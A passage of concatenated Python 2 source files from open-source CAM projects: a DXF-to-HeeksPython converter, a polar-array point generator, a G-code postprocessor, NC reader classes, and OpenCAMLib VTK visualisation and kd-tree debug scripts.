float(circ['20'])*scale)
radius = float(circ['40'])*scale
coords = (cntr, radius)
#print "#Circle,"+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+"\n"
collector.append("cad.circle("+str(cntr[0])+","+str(cntr[1])+","+str(radius)+")\n")
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
mcdict[k] = coords
string = "".join(collector)
k = 0
for arc in arcs:
cntr = (float(arc['10'])*scale,
float(arc['20'])*scale)
radius = float(arc['40'])*scale
a0 = float(arc['50'])
a1 = float(arc['51'])
coords = (cntr, radius, a0, a1)
angle1=((math.pi)/180)*a0
angle2=((math.pi)/180)*a1
#print "#Arc,"+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+","+str(angle1)+","+str(angle2)+"\n"
collector.append("cad.arc("+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+","+str(angle1)+","+str(angle2)+",0,0,1)\n")
#hardcoded dir vector and need to convert angles to radians, I
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
madict[k] = coords
string = "".join(collector)
string= string + "cad.reorder(sketch"+str(sketch_num)+")\n"
#string= string + "cad.revolve(sketch,360)"
return string
#example of how to use it
'''
import HeeksPython as cad
import sys
sys.path.insert(0,'/home/dan/heeks/heekspython2/examples')
import dxf_to_heekspython
file_in='/home/dan/Documents/drawings/blob.dxf'
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
exec(l)
or scale the object/sketch like this:
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
l = l +"cad.scale(sketch1,0,0,0,.25)"
exec(l)
or even revolve a solid after returning l
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
l = l +"cad.revolve(sketch1,360)"
exec(l)
'''
```
#### File: heekspython/examples/polar_array.py
```python
import HeeksPython as cad
import math
import wx
# begin wxGlade: extracode
# end wxGlade
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MyFrame.__init__
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.x_center_label = wx.StaticText(self, -1, "X center")
self.x_center_entry = wx.TextCtrl(self, -1, "")
self.y_center_label = wx.StaticText(self, -1, "Y center")
self.y_center_entry = wx.TextCtrl(self, -1, "")
self.z_center_label = wx.StaticText(self, -1, "Z center")
self.z_center_entry = wx.TextCtrl(self, -1, "")
self.number_points_label = wx.StaticText(self, -1, "Number of Points")
self.no_of_holes_entry = wx.TextCtrl(self, -1, "")
self.diameter_label = wx.StaticText(self, -1, "Polar Array Diameter")
self.bolt_circle_diameter_entry = wx.TextCtrl(self, -1, "")
self.angle_label = wx.StaticText(self, -1, "Starting Angle")
self.start_angle_entry = wx.TextCtrl(self, -1, "")
self.scale_label = wx.StaticText(self, -1, "Scale")
self.Scale_entry = wx.TextCtrl(self, -1, "")
self.GenButton = wx.Button(self, -1, "Generate Points")
self.quit = wx.Button(self, -1, "Close")
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_BUTTON, self.GenCode, self.GenButton)
self.Bind(wx.EVT_BUTTON, self.OnCloseMe, self.quit)
# end wxGlade
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle("Generate Polar Array of Points")
# end wxGlade
def __do_layout(self):
# begin wxGlade: MyFrame.__do_layout
grid_sizer_1 = wx.GridSizer(9, 2, 0, 0)
grid_sizer_1.Add(self.x_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.x_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.y_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.y_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.z_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.z_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.number_points_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.no_of_holes_entry, 0, 0, 0)
grid_sizer_1.Add(self.diameter_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.bolt_circle_diameter_entry, 0, 0, 0)
grid_sizer_1.Add(self.angle_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.start_angle_entry, 0, 0, 0)
grid_sizer_1.Add(self.scale_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.Scale_entry, 0, 0, 0)
grid_sizer_1.Add(self.GenButton, 0, 0, 0)
grid_sizer_1.Add(self.quit, 0, 0, 0)
self.SetSizer(grid_sizer_1)
grid_sizer_1.Fit(self)
self.Layout()
# end wxGlade
def OnCloseMe(self, event): # wxGlade: MyFrame.<event_handler>
print "We're Done!!!!!"
self.Destroy()
def GenCode(self, event): # wxGlade: MyFrame.<event_handler>
cad.sketch()
sketch = cad.getlastobj()
x_center=float(self.x_center_entry.GetValue())
y_center=float(self.y_center_entry.GetValue())
z_center=float(self.z_center_entry.GetValue())
no_of_holes=float(self.no_of_holes_entry.GetValue())
bolt_circle_diameter=float(self.bolt_circle_diameter_entry.GetValue())
start_angle=float(self.start_angle_entry.GetValue())
scale=float(self.Scale_entry.GetValue())
count = 0
anglecount=1
circle_division_angle=(360/no_of_holes)
calc_angle=start_angle
while (count < no_of_holes):
x1=math.cos(math.radians(calc_angle))*(bolt_circle_diameter/2)
y1=math.sin(math.radians(calc_angle))*(bolt_circle_diameter/2)
x=(x1+x_center)*scale
y=(y1+y_center)*scale
z=(z_center)*scale
cad.point(x,y,z)
cad.add(sketch,cad.getlastobj())
data=str('X%.4f Y%.4f Z%.4f '% (x, y, z)+'\n')
print data
anglecount=anglecount+1
calc_angle=calc_angle + circle_division_angle
count=count+1
cad.reorder(sketch);
return sketch
# end of class MyFrame
#we don't need the next section of code- it would crash Heeks
'''if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()'''
```
#### File: freesteel/test/garston.py
```python
from FreesteelPython import *
import FreesteelWindow
import sys
import postprocessor
#from postprocessor import postprocess
from coreRough import coreRough
def makeRectBoundary(sx):
bdy = PathXSeries()
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.lo))
bdy.Add(P2(sx.gxrg.hi, sx.gyrg.lo))
bdy.Add(P2(sx.gxrg.hi, sx.gyrg.hi))
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.hi))
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.lo))
bdy.z = sx.gzrg.hi + 5
bdy.Break()
return bdy
def makeParams(stepdown=15.0, toolcornerrad=3.0, toolflatrad=0.0, retractheight=50.0):
params = MachineParams()
# linking parameters
params.leadoffdz = 0.1
params.leadofflen = 1.1
params.leadoffrad = 2.0
params.retractzheight = retractheight
params.leadoffsamplestep = 0.6
# cutting parameters
params.toolcornerrad = toolcornerrad
params.toolflatrad = toolflatrad
params.samplestep = 0.4
params.stepdown = stepdown
params.clearcuspheight = params.stepdown / 3.0
# weave parameters
params.triangleweaveres = 0.51
params.flatradweaveres = 0.71
# stearing parameters
# fixed values controlling the step-forward of the tool and
# changes of direction.
params.dchangright = 0.17
params.dchangrightoncontour = 0.37
params.dchangleft = -0.41
params.dchangefreespace = -0.6
params.sidecutdisplch = 0.0
params.fcut = 1000
params.fretract = 5000
params.thintol = 0.0001
return params
mainframe = FreesteelWindow.MainFrame()
vtkwindow = mainframe.vtkwindow
surfhandle = vtkwindow.LoadSTL("mm.stl")
vtkwindow.showAll() # zoom to fit
surfx = SurfX()
vtkwindow.PushTrianglesIntoSurface(surfhandle, surfx)
surfx.BuildComponents()
boundary = makeRectBoundary(surfx)
vtkwindow.addPathxSeries(boundary)
vtkwindow.render()
params = makeParams()
params.retractheight = surfx.gzrg.hi + 2
z = surfx.gzrg.lo + 2
pathx = PathXSeries()
coreRough(pathx, surfx, boundary, params, z)
vtkwindow.addPathxSeries(pathx)
pathx2 = pathx
z = surfx.gzrg.lo + 20
coreRough(pathx2, surfx, boundary, params, z)
vtkwindow.addPathxSeries(pathx2)
vtkwindow.render()
# send to post processor
postprocessor.postprocess(pathx, "ghgh.tap")
if ('interactive' not in sys.argv):
# Running mainloop. Run interactively (-i) with argument 'interactive' to access the interactive console.
mainframe.mainloop()
```
#### File: freesteel/test/postprocessor.py
```python
from FreesteelPython import *
import FreesteelWindow
import sys
import string
class pp:
def __init__(self):
self.lx0 = ""
self.ly0 = ""
self.lz0 = ""
def writeheading(self, fout):
fout.write("BEGINPGM\n")
fout.write("LOADTL1\n")
def writeline(self, fout, x, y, z):
res = [ 'L' ]
sx = "X%.3f" % x
if sx != self.lx0:
res.append(sx)
self.lx0 = sx
sy = "Y%.3f" % y
if sy != self.ly0:
res.append(sy)
self.ly0 = sy
sz = "Z%.3f" % z
if sz != self.lz0:
res.append(sz)
self.lz0 = sz
if len(res) > 1:
res.append('\n')
fout.write(string.join(res, ''))
def writePath(self, fout, pathx):
j = 0
restart = 1
for i in xrange(pathx.GetNpts()):
if (j == pathx.GetNbrks()) or (i < pathx.GetBrkIndex(j)):
if restart == 1:
fout.write("//////// Begin new path ///////\n")
self.writeline(fout, pathx.GetX(i - 1), pathx.GetY(i - 1), pathx.z)
restart = 0
self.writeline(fout, pathx.GetX(i), pathx.GetY(i), pathx.z)
else:
while (j < pathx.GetNbrks()) and (i == pathx.GetBrkIndex(j)):
if pathx.GetNlnks(j) > 0:
restart == 1
fout.write("//////// Begin new link ///////\n")
for il in xrange(pathx.GetNlnks(j)):
self.writeline(fout, pathx.GetLinkX(j, il), pathx.GetLinkY(j, il), pathx.GetLinkZ(j, il))
j = j + 1
def postprocess(pathx, fname):
lpp = pp()
fout = open(fname, "w")
lpp.writeheading(fout)
fout.write("G0\n")
lpp.writePath(fout, pathx)
#for i in xrange(pathx.GetNpts()):
# lpp.writeline(fout, pathx.GetX(i), pathx.GetY(i), pathx.z)
fout.write("ENDPGM\n")
fout.close()
```
#### File: heekscnc/nc/centroid1_read.py
```python
import iso_read as iso
import sys
# just use the iso reader
class Parser(iso.Parser):
def __init__(self, writer):
iso.Parser.__init__(self, writer)
```
#### File: heekscnc/nc/DeckelFP4Ma.py
```python
import nc
import iso
import math
import datetime
import time
from format import Format
now = datetime.datetime.now()
class Creator(iso.Creator):
def __init__(self):
iso.Creator.__init__(self)
self.output_tool_definitions = False
self.fmt = Format(dp_wanted = False, add_trailing_zeros = True, add_plus = True)
def SPACE_STR(self): return ' '
def PROGRAM(self): return None
def PROGRAM_END(self): return( 'T0' + self.SPACE() + 'M06' + self.SPACE() + 'M02')
############################################################################
## Begin Program
def program_begin(self, id, comment):
self.write( ('(Created with Deckel FP4Ma post processor ' + str(now.strftime("%Y/%m/%d %H:%M")) + ')' + '\n') )
iso.Creator.program_begin(self, id, comment)
nc.creator = Creator()
```
#### File: heekscnc/nc/hpgl3d_read.py
```python
import num_reader
import sys
import math
class Parser(num_reader.NumReader):
def __init__(self, writer):
num_reader.NumReader.__init__(self, writer)
self.x = 0
self.y = 0
self.z = 10000
self.f = 0
self.units_to_mm = 0.01
def ParseV(self):
self.line_index = self.line_index + 1
f = self.get_number()
if len(f) > 0:
self.f = float(f)
self.add_word("prep")
def ParseZ(self):
self.line_index = self.line_index + 1
x = self.get_number()
if len(x) > 0:
y = self.get_number()
if len(y) > 0:
z = self.get_number()
if len(z) > 0:
if self.f > 40: color = "rapid"
else: color = "feed"
self.add_word(color)
self.writer.begin_path(color)
self.writer.add_line(int(x) * self.units_to_mm, int(y) * self.units_to_mm, int(z) * self.units_to_mm)
self.writer.end_path()
self.x = int(x)
self.y = int(y)
self.z = int(z)
def ParseFromFirstLetter(self, c):
if c == 'Z':
self.ParseZ()
elif c == 'V':
self.ParseV()
```
#### File: heekscnc/pycnc/NoCad.py
```python
import sys
import getopt
from Cad import Cad
import HeeksCNC
import wx
import wx.aui
# this is an example of how to plugin HeeksCNC into a cad system
# here we make a wxWidgets application with a menu to represent the CAD system
class NoCad(Cad):
def __init__(self):
self.current_profile_dxf = []
Cad.__init__(self)
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help"])
except getopt.error, msg:
print msg
print "for help use --help"
sys.exit(2)
# process options
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit(0)
# process arguments
for arg in args:
self.current_profile_dxf.append('"')
self.current_profile_dxf.append(arg)
self.current_profile_dxf.append('" ')
#self.current_profile_dxf = arg # process() is defined elsewhere
# make a wxWidgets application
self.frame= wx.Frame(None, -1, 'CAM ( Computer Aided Manufacturing ) from DXF files')
self.menubar = wx.MenuBar()
self.frame.Bind(wx.EVT_MENU_RANGE, self.OnMenu, id=100, id2=1000)
self.menu_map = {}
self.next_menu_id = 100
self.aui_manager = wx.aui.AuiManager()
self.aui_manager.SetManagedWindow(self.frame)
def OnMenu(self, event):
callback = self.menu_map[event.GetId()]
callback()
def OnMenuOpen(self):
pass
def add_menu_item(self, menu, label, callback, icon = None):
item = wx.MenuItem(menu, self.next_menu_id, label)
self.menu_map[self.next_menu_id] = callback
self.next_menu_id = self.next_menu_id + 1
menu.AppendItem(item)
def addmenu(self, name):
menu = wx.Menu()
self.menubar.Append(menu, name)
return menu
def add_window(self, window):
self.aui_manager.AddPane(window, wx.aui.AuiPaneInfo().Name(window.GetLabel()).Caption(window.GetLabel()).Center())
def get_frame_hwnd(self):
return self.frame.GetHandle()
def get_frame_id(self):
return self.frame.GetId()
def on_new_or_open(self, open, res):
if open == 0:
pass
else:
pass
def on_start(self):
pass
def get_view_units(self):
return 1.0
def get_selected_sketches(self):
return self.current_profile_dxf
def hide_window_on_pick_sketches(self):
return False
def pick_sketches(self):
# returns a list of strings, one name for each sketch
str_sketches = []
# open dxf file
dialog = wx.FileDialog(HeeksCNC.frame, "Choose sketch DXF file", wildcard = "DXF files" + " |*.dxf")
dialog.CentreOnParent()
if dialog.ShowModal() == wx.ID_OK:
str_sketches.append(dialog.GetPath())
return str_sketches
def repaint(self):
# repaints the CAD system
#heekscad.redraw()
pass
def GetFileFullPath(self):
return None
def WriteAreaToProgram(self, sketches):
HeeksCNC.program.python_program += "a = area.Area()\n"
for sketch in sketches:
HeeksCNC.program.python_program += 'sub_a = area.AreaFromDxf("' + sketch + '")\n'
HeeksCNC.program.python_program += "for curve in sub_a.getCurves():\n"
HeeksCNC.program.python_program += " a.append(curve)\n"
HeeksCNC.program.python_program += "\n"
def main():
app = wx.App()
nocad = NoCad()
HeeksCNC.cad = nocad
HeeksCNC.start()
nocad.frame.SetMenuBar(nocad.menubar)
nocad.frame.Center()
nocad.aui_manager.Update()
nocad.frame.Show()
app.MainLoop()
if __name__ == '__main__':
main()
```
#### File: opencamlib/scripts/edge_offset_tst_1.py
```python
import ocl
import pyocl
import camvtk
import time
import vtk
import datetime
import math
def drawEdge(myscreen, a, b):
myscreen.addActor(camvtk.Sphere(center=(a.x,a.y,a.z), radius=0.0351, color=camvtk.green));
myscreen.addActor(camvtk.Sphere(center=(b.x,b.y,b.z), radius=0.0351, color=camvtk.red));
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(b.x,b.y,b.z)) )
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
camvtk.drawOCLtext(myscreen)
camvtk.drawArrows(myscreen,center=(-1,-2,0))
a=ocl.Point(0,1.7,-0.6)
b=ocl.Point(0,0.11,0.3)
drawEdge(myscreen, a, b)
diameter=0.4
length=1
# spherical cutter and cylinder
s1 = camvtk.Sphere(center=(a.x,a.y,a.z), radius=diameter/2, color=camvtk.lgreen)
s2 = camvtk.Sphere(center=(b.x,b.y,b.z), radius=diameter/2, color=camvtk.pink)
s1.SetOpacity(1)
s2.SetOpacity(1)
myscreen.addActor(s1)
myscreen.addActor(s2)
# tube
cyltube = camvtk.Tube( p1=(a.x,a.y,a.z) , p2=(b.x,b.y,b.z), radius=diameter/2, color=camvtk.yellow )
cyltube.SetOpacity(0.2)
myscreen.addActor( cyltube )
# Cylinder
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
cir1 = camvtk.Circle(center=(a.x,a.y,a.z) , radius=diameter/2, color=camvtk.lgreen, resolution=50 )
cir1.SetOpacity(1)
myscreen.addActor(cir1)
cir2 = camvtk.Circle(center=(b.x,b.y,b.z) , radius=diameter/2, color=camvtk.pink, resolution=50 )
cir2.SetOpacity(1)
myscreen.addActor(cir2)
# draw lines along the elliptic tube
# Toroid
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
tor1 = camvtk.Toroid(r1=diameter/2, r2=diameter/6, center=(a.x,a.y,a.z), rotXYZ=(0,0,0), color=camvtk.lgreen)
tor1.SetOpacity(1)
myscreen.addActor(tor1)
tor2 = camvtk.Toroid(r1=diameter/2, r2=diameter/6, center=(b.x,b.y,b.z), rotXYZ=(0,0,0), color=camvtk.pink)
tor2.SetOpacity(1)
myscreen.addActor(tor2)
# Cone
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
con1 = camvtk.Cone(center=(a.x,a.y,a.z), radius=diameter/2, height = 0.3, color=camvtk.lgreen )
myscreen.addActor(con1)
con2 = camvtk.Cone(center=(b.x,b.y,b.z), radius=diameter/2, height = 0.3, color=camvtk.pink )
myscreen.addActor(con2)
print "done."
myscreen.camera.SetPosition(4, 3, 2)
myscreen.camera.SetFocalPoint(0, 0, 0)
myscreen.render()
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
#for n in range(1,18):
# t.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
# myscreen.camera.Azimuth( 2 )
# time.sleep(0.1)
# myscreen.render()
# w2if.Modified()
# lwr.SetFileName("frames/tc"+ ('%04d' % n)+".png")
#lwr.Write()
myscreen.iren.Start()
#raw_input("Press Enter to terminate")
```
#### File: scripts/fiber/fiber_15_conecutter_anim.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
import os
def drawFiber_clpts(myscreen, f, fibercolor=camvtk.red):
inter = f.getInts()
#print "fiber has ", len(inter) , " intervals"
for i in inter:
if not i.empty():
ip1 = f.point( i.lower )
ip2 = f.point( i.upper )
#myscreen.addActor( camvtk.Line(p1=(ip1.x,ip1.y,ip1.z),p2=(ip2.x,ip2.y,ip2.z), color=fibercolor) )
myscreen.addActor( camvtk.Sphere(center=(ip1.x,ip1.y,ip1.z),radius=0.005, color=camvtk.clColor( i.lower_cc) ) )
myscreen.addActor( camvtk.Sphere(center=(ip2.x,ip2.y,ip2.z),radius=0.005, color=camvtk.clColor( i.upper_cc) ) )
#cc1 = i.lower_cc
#cc2 = i.upper_cc
#myscreen.addActor( camvtk.Sphere(center=(cc1.x,cc1.y,cc1.z),radius=0.005, color=camvtk.pink ) )
#myscreen.addActor( camvtk.Sphere(center=(cc2.x,cc2.y,cc2.z),radius=0.005, color=camvtk.pink ) )
# colors from camvtk.py:
# ocl.CCType.VERTEX: col = red
# ocl.CCType.EDGE_HORIZ: col = orange
# ocl.CCType.EDGE_SHAFT: col = mag
def yfiber(cutter,yvals,t,zh,myscreen):
for y in yvals:
f1 = ocl.Point(-5.5,y,zh) # start point of fiber
f2 = ocl.Point(5.5,y,zh) # end point of fiber
f = ocl.Fiber( f1, f2)
i = ocl.Interval()
cutter.pushCutter(f,i,t)
f.addInterval(i)
drawFiber_clpts(myscreen, f, camvtk.red)
def xfiber(cutter,xvals,t,zh,myscreen):
for x in xvals:
f1 = ocl.Point(x,-5.5,zh) # start point of fiber
f2 = ocl.Point(x,5.5,zh) # end point of fiber
f = ocl.Fiber( f1, f2)
i = ocl.Interval()
cutter.pushCutter(f,i,t)
f.addInterval(i)
drawFiber_clpts(myscreen, f, camvtk.lblue)
def drawScreen(a,b,c,filename,write_flag):
print ocl.revision()
myscreen = camvtk.VTKScreen()
z_hi = a.z
if b.z > z_hi:
z_hi = b.z
if c.z > z_hi:
z_hi = c.z
z_lo = a.z
if b.z < z_lo:
z_lo = b.z
if c.z < z_lo:
z_lo = c.z
#z_hi = 0.3 # this is the shallow case
#ztri = 0.8 # this produces the steep case where we hit the circular rim
#z_lo = 0.1
#a = ocl.Point(0,1,ztri)
#b = ocl.Point(1,0.5,ztri)
#c = ocl.Point(0.2,0.2,ztri_lo)
myscreen.addActor(camvtk.Point(center=(a.x,a.y,a.z), color=(1,0,1)))
myscreen.addActor(camvtk.Point(center=(b.x,b.y,b.z), color=(1,0,1)))
myscreen.addActor(camvtk.Point(center=(c.x,c.y,c.z), color=(1,0,1)))
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(c.x,c.y,c.z)) )
myscreen.addActor( camvtk.Line(p1=(c.x,c.y,c.z),p2=(b.x,b.y,b.z)) )
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(b.x,b.y,b.z)) )
t = ocl.Triangle(b,c,a)
angle = math.pi/5
diameter=0.3
length=5
#cutter = ocl.BallCutter(diameter, length)
#cutter = ocl.CylCutter(diameter, length)
#cutter = ocl.BullCutter(diameter, diameter/4, length)
cutter = ocl.ConeCutter(diameter, angle, length)
#cutter = cutter.offsetCutter( 0.1 )
print "cutter= ", cutter
print "length=", cutter.getLength()
print "fiber..."
range=2
Nmax = 100
yvals = [float(n-float(Nmax)/2)/Nmax*range for n in xrange(0,Nmax+1)]
xvals = [float(n-float(Nmax)/2)/Nmax*range for n in xrange(0,Nmax+1)]
zmin = z_lo - 0.3
zmax = z_hi
zNmax = 20
dz = (zmax-zmin)/(zNmax-1)
zvals=[]
for n in xrange(0,zNmax):
zvals.append(zmin+n*dz)
for zh in zvals:
yfiber(cutter,yvals,t,zh,myscreen)
xfiber(cutter,xvals,t,zh,myscreen)
print "done."
myscreen.camera.SetPosition(-2, -1, 3)
myscreen.camera.SetFocalPoint(1.0, 0.0, -0.5)
camvtk.drawArrows(myscreen,center=(-0.5,-0.5,-0.5))
camvtk.drawOCLtext(myscreen)
myscreen.render()
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
w2if.Modified()
lwr.SetFileName(filename)
if write_flag:
lwr.Write()
print "wrote ",filename
#myscreen.iren.Start()
#raw_input("Press Enter to terminate")
if __name__ == "__main__":
ztri = 0.3 # this is the shallow case
#ztri = 0.8 # this produces the steep case where we hit the circular rim
ztri_lo = 0.1
Nmax = 300
thetamax = 2*math.pi
for n in xrange(0,Nmax):
theta=thetamax/Nmax
a = ocl.Point(0,1,ztri)
a.xRotate(theta*n)
b = ocl.Point(1,0.0,0)
b.xRotate(theta*n)
c = ocl.Point(0.2,0.0,ztri)
c.xRotate(theta*n)
current_dir = os.getcwd()
filename = current_dir + "/frames/conecutter_"+ ('%05d' % n)+".png"
drawScreen(a,b,c,filename, 1)
```
#### File: opencamlib/scripts/kdtree_debug_0.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
def main():
myscreen = camvtk.VTKScreen()
focal = cam.Point(5, 5, 0)
r = 30
theta = (float(45)/360)*2*math.pi
fi=45
campos = cam.Point( r*math.sin(theta)*math.cos(fi), r*math.sin(theta)*math.sin(fi), r*math.cos(theta) )
myscreen.camera.SetPosition(campos.x, campos.y, campos.z)
myscreen.camera.SetFocalPoint(focal.x,focal.y, focal.z)
t = camvtk.Text()
t.SetPos( (myscreen.width-450, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
ytext = "kd-tree debug" #"Y: %3.3f" % (ycoord)
t2.SetText(ytext)
t2.SetPos( (50, myscreen.height-50) )
myscreen.addActor( t2)
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
epos = cam.Epos()
epos.setS(0,1)
t.SetText("OpenCAMLib 10.03-beta, " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#ycoord = 1.1
stl = camvtk.STLSurf(filename="../stl/demo.stl")
#stl = camvtk.STLSurf(filename="../stl/demo2.stl")
print "STL surface read"
#myscreen.addActor(stl)
#stl.SetWireframe()
#stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s= cam.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
myscreen.addActor( camvtk.Sphere( center=(0,0,0), radius=0.2, color = camvtk.yellow ) )
s.build_kdtree()
print "built kd-tree"
s.jump_kd_reset()
tlist = s.get_kd_triangles()
print "got", len(tlist), " triangles"
while (s.jump_kd_hi()):
lotris = s.get_kd_triangles()
s.jump_kd_up()
cut = s.get_kd_cut()
s.jump_kd_lo()
hitris = s.get_kd_triangles()
lev = s.get_kd_level()
print "l=", lev, " hi=", len(hitris), " lo=", len(lotris), " cut=", cut
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
#myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
slo = camvtk.STLSurf(triangleList=lotris)
slo.SetColor(camvtk.pink)
slo.SetWireframe()
shi = camvtk.STLSurf(triangleList=hitris)
shi.SetColor(camvtk.lgreen)
shi.SetWireframe()
myscreen.addActor(slo)
myscreen.addActor(shi)
myscreen.render()
myscreen.iren.Start()
raw_input("Press Enter to terminate")
time.sleep(1)
myscreen.removeActor(slo)
myscreen.removeActor(shi)
print "done."
myscreen.render()
#lwr.SetFileName(filename)
#raw_input("Press Enter to terminate")
time.sleep(0.2)
lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
main()
#raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/kdtree_debug_3.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
def kdtreesearch(myscreen, tlist, s, cutter, cl, depth):
#print "surface=", s.str()
#print "cutter=", cutter.str()
#print "cl=", cl.str()
myscreen.render()
#raw_input("Press Enter to terminate")
#time.sleep(1)
if (depth==1): # stop jumping and return all triangles
tris = s.get_kd_triangles()
for t in tris:
tlist.append(t)
return
# jump high or low depending on search
cut = s.get_kd_cut()
print "cutvalues: ", cut
dim = cut[0]
cval = cut[1]
if dim == 0: # cut along xmax
print cval, " < ", cl.x - cutter.radius, " ??"
if ( cval < ( cl.x - cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(cval,100,0), p2=(cval,-100,0), color = camvtk.green ) )
s.jump_kd_lo()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.blue)
s.jump_kd_up()
print "xmax: jump ONLY hi"
s.jump_kd_hi()
print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
print "len tlist=", len(tlist), " now level=", s.get_kd_level()
else:
#print "xmax: jump both hi and lo"
s.jump_kd_hi()
#print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
s.jump_kd_up()
s.jump_kd_lo()
#print "search lo at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
if dim == 1:
print cval, " > ", cl.x + cutter.radius, " ??"
if ( cval > ( cl.x + cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(cval,100,0), p2=(cval,-100,0), color = camvtk.lgreen ) )
s.jump_kd_hi()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.blue)
s.jump_kd_up()
print "xmin: jump only lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "xmin: jump both hi and lo"
s.jump_kd_lo()
kdtreesearch(tlist, s, cutter, cl, depth-1)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
if dim == 2:
print cval, " < ", cl.y - cutter.radius, " ??"
if ( cval < ( cl.y - cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(100,cval,0), p2=(-100,cval,0), color = camvtk.red ) )
s.jump_kd_lo()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.yellow)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "ymax: jump both hi and lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
if dim == 3: # cut along ymin
print cval, " > ", cl.y + cutter.radius, " ??"
if ( cval > ( cl.y + cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(100,cval,0), p2=(-100,cval,0), color = camvtk.pink ) )
s.jump_kd_hi()
